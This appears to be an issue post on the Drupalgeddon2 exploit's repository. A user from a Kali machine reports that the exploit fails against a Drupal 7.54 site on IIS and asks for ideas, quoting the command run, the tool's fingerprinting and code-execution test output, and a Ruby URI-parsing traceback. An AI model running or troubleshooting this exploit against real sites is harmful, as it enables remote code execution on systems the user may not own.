Drupal v7.54 #65
Description
Hi,
#attack machine
kali 2020_03 full updated
#target
OS: Windows
webserver: IIS8.5
Drupal v7.54
https://www.local.com/CHANGELOG.txt
Tried with the 'try_phpshell = true' and 'try_phpshell = false' not runing.
Any ideas i could try?
############
[root:/opt/Drupalgeddon2]# ruby drupalgeddon2.rb https://www.local.com/ (master)
[*] --==[::#Drupalggedon2::]==--
[i] Target : https://www.local.com/
[+] Found : https://www.local.com/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
[*] Testing: Form (user/password)
[+] Result : Form valid
[*] Testing: Clean URLs
[+] Result : Clean URLs enabled
[*] Testing: Code Execution (Method: name)
[i] Payload: echo EOLRQNNO
Traceback (most recent call last):
7: from drupalgeddon2.rb:463:in <main>' 6: from drupalgeddon2.rb:463:in each'
5: from drupalgeddon2.rb:473:in block in <main>' 4: from drupalgeddon2.rb:44:in http_request'
3: from /usr/lib/ruby/2.7.0/uri/common.rb:737:in URI' 2: from /usr/lib/ruby/2.7.0/uri/common.rb:234:in parse'
1: from /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:73:in parse' /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:21:in split': URI must be ascii only "https://www.local.com/?q=file/ajax/name/%23value/form-2sKgFeXBW8q3Ukw1XT7U6wHkN_RxDjP0zcrXhWGxt68\\" /><input type=\"hidden\" name=\"form_id\" value=\"search_block_form\" /><div style=\"clear:both\"><div class=\"block-sep\"><div id=\"navigation\" role=\"navigation\" class=\"clearfix\"><div class=\"constrain\"><div id=\"nav-left\"><div id=\"nav-right\"><ul id=\"navmenu\" class=\"sf-menu sf-js-enabled sf-shadow\">
- <a href=\"